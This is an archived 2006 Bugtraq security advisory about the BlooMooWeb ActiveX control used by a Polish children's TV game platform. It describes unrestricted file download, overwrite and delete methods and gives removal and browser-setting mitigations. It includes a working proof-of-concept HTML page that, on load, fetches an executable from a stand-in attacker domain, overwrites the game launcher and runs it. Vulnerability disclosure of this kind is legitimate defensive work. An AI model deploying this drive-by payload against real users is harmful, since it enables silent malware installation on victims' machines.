[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061031002815.29461.qmail@securityfocus.com>
Date: 31 Oct 2006 00:28:15 -0000
From: maxgipeh@...oo.com
To: bugtraq@...urityfocus.com
Subject: ActiveX security leaks in the TV owned web game platform
There is a security problem within the architecture / design issues
of the BlooMooWeb ActiveX control.
BlooMooWeb is an internet game platform for kids, popular mainly
in Poland. It has been provided for the TV programme
"Krolestwo Maciusia" ("The Kingdom of Macius")
broadcast in TVP1 - first channel of Polish public television.
The flaws allows any malicious person who would induce the
remote user to click specified link, to
download silently and immediately execute
any attacker supplied code, in the current user context.
Technical description:
BlooMooWeb ActiveX control, using the CLSID idetifier
CLSID: 22E9EFBA-114C-4DA0-AE72-D8F2C7138002,
is being used by the web platform to download and install the game
system files and later for particular game downloading / instalation purposes.
After game system is installed (installation of ActiveX control has
been approved / BlooMooWeb platform has been downloaded and installed)
the game system binaries and data are stored in the following directory:
C:/Program Files/AidemMedia/BlooMooWeb
and the default launch path is set to that directory.
Following 3 methods, being used for the scripting layer in
data download / installation process, could be particularly intresting:
BW_DownloadFile(BSTR bstrUrl, BSTR bstrLocalFile,BSTR bstrCallback)
BW_LaunchGame(BSTR bstrParams)
BW_DeleteTempFile(BSTR filePath)
First of all it has to be said, that the control implemetation doesn't
have any protection allowing to distinguish between game platform
data area and users system data area.
Therfore any path parameters passed to the controls methods can point anywhere
outside the local installation place on the users harddrive.
BW_DownloadFile() method, using non-blocking streaming with callback
system, downloads a remote file specified by the URL string bstrUrL parameter,
streaming it down with the overwrite IO permission to the file
pointed to by the bstrLocalFile parameter.
The third parameter is a callback function pointer which can be used to
track visually(GUI) / silently the download progress.
The call to BW_LaunchGame method with any
string argument will result in execution of the:
%BlooMooWebDirectory%/BlooMooWeb.exe
binary (game platform core executable)
and new process spawning in the current user context.
After noticing that the control has only callbacks system and no GUI
it should be a simple deal to execute it silently with no user interaction or signaling.
However, having full scripting access to the method that downloads
any data with overwrite IO permission (including binaries)
with no user interaction, to any directory on the
users physical disk, it can be used to overwrite the default
game-launcher binary BlooMooWeb.exe by an attacker chosen file.
After that, any single call to BW_LaunchGame() will spawn new process from
the attackers supplied binary file.
Simplyfying - with just one users click on the attacker provided link,
the attacker supplied executable code (containing trojan-horse,
virus, spy stuff, adWare, etc. )
can be downloaded silently and instantly executed within the users account privillages.
DoS type attack vector is introduced by BW_DeleteTempFile() method,
not embedded with the internal ActiveX installer system,
but available externally for scripting.
It is used by the game installer engine to delete files after game
deinstallation and in other cleanup purposes.
It uses a single string argument, which can point to ANY file on the users physical disk.
That introduces another "creepy" scenario where
the user induced by the malicious attacker to visit attacker-controlled site
can simply by one-click on the link , wipe any
data from own disk including erasing operating system core files leading to users OS crash.
Concluding:
The BlooMooWeb web game platform has been designed
by gaming company and TV producer - Aidem Media and started in January 2006
as a part of public Polish television show for kids called "Krolestwo Maciusia".
Since then it gained over 12000 forum registered users, with web chat,
forums and ICQ/GG messaging prototocols indetity tracking.
Excluding the users that had their operating systems reinstalled or had chanded
the ActiveX security policy of their
browser since the game platform intallation, it could be expected
that this web game system is wide spread and has rather big audience,
in and outside Poland.
Taking into consideration that a TV supported / owned game platform
makes itself trustworthy enough to approve ActiveX control installation,
the origins of flaw in this software, could be interpreted in two ways:
as an accidental security vulnerability being a result of bad architecture design,
or as a backdoor system into platform users machines, "accidentally" built in by the vendor.
Affected software:
Windows 98 SE
Windows 2000 SP4
Windows XP pro SP2
Windows 2003 Server Standard SP1
BlooMooWeb ActiveX CTL v1.0.9
Example PoC exploit showing remote execution of attacker supplied binary code:
<html>
<head>
<script language="JavaScript">
var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";
function spawn2()
{
aa1=o2obj.GetInstallationDir(null);
aa2="BlooMooWEB.exe";
o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001");
}
function callback001( msgCode, param1, param2, param3 )
{
if(msgCode == 'DOWNLOAD_COMPLETE' )
{
o2obj.BW_LaunchGame("treleferekuku");
}
}
</script>
</head>
<body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002"
</object>
</body>
</html>
Solution:
-removal of BlooMooWeb ActiveX control binary, placed in:
%WindowsDirectory%/dowloaded program files/AidemATL.dll
-turning off entirely ActiveX in the Browser settings (or switching the browser to a non-Microsoft one and forgetting about MS suicidal inventions)
-thinking twice before installation approval of any ActiveX driven software either unsigned or wide spread "big corp" signed
Links:
"The Kingdom of Macius" TV show official web page:
http://www.krolestwomaciusia.pl
BlooMooWeb game portal:
http://www.krolestwomaciusia.pl/bweb_aktualnosci.php
Polish public television main web page:
http://www.tvp.pl
information provided by Max Gipehtykrop of German Reverse Force
maxgipeh@...oo.com
Powered by blists - more mailing lists